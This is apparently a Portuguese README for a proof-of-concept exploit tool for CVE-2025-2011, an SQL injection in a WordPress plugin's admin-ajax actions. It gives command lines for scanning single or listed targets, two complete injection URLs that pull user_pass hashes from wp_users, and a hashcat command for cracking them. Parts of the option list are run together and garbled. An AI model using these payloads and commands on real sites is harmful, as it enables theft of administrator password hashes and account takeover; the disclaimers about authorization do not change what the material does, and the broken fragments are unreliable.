
Exploit for CVE-2025-2011
Por: X3RX3S Mas orgulhosamente roubado por Ash Wesker que usou GPT no meu código com o banner dele ;) veja aqui ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Você pode até ver meu nome de usuário no código 'dele' -_-'
Propósito: Uma ferramenta de prova de conceito para testar uma vulnerabilidade de injeção SQL (CVE-2025-2011) em sites WordPress.
Aviso: Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito. Testes não autorizados são ilegais e antiéticos.

-p 1 ou -p 2)$2a$, $2b$, $2y$), incluindo variantes prefixadas com $wp$results_<hostname>.txt-m 3200) com um prompt-u) ou múltiplos alvos via arquivo (-f)requestscoloramaInstale as dependências:
pip install requests colorama
Opcional (para quebra de hashes):
hashcat instalado e disponível no seu PATH (padrão é /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtTorner o script executável (opcional):
chmod +x CVE-2025-2011.py
Alvo único (payload 1 padrão):
python3 CVE-2025-2011.py -u https://example.com
Alvo único (payload 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
Múltiplos alvos a partir de arquivo (uma URL por linha):
python3 CVE-2025-2011.py -f targets.txt
Para cada host testado, o script salva um arquivo de resultado:
results_<hostname>.txt
Se hashes bcrypt forem encontrados, eles são salvos em hashes.txt e você será solicitado a quebrá-los com Hashcat. Exemplo de comando Hashcat usado pelo script:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Nota: bcrypt é lento por design. A quebra pode levar muito tempo e exigir GPUs.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Esta ferramenta é fornecida apenas para fins educacionais e defensivos. Não a utilize contra sistemas para os quais você não tenha permissão explícita. O autor e o distribuidor não assumem qualquer responsabilidade pelo uso indevido. Sempre obtenha autorização por escrito antes de executar testes contra alvos que você não possui.
run_hashcat no script para apontar para sua lista preferida.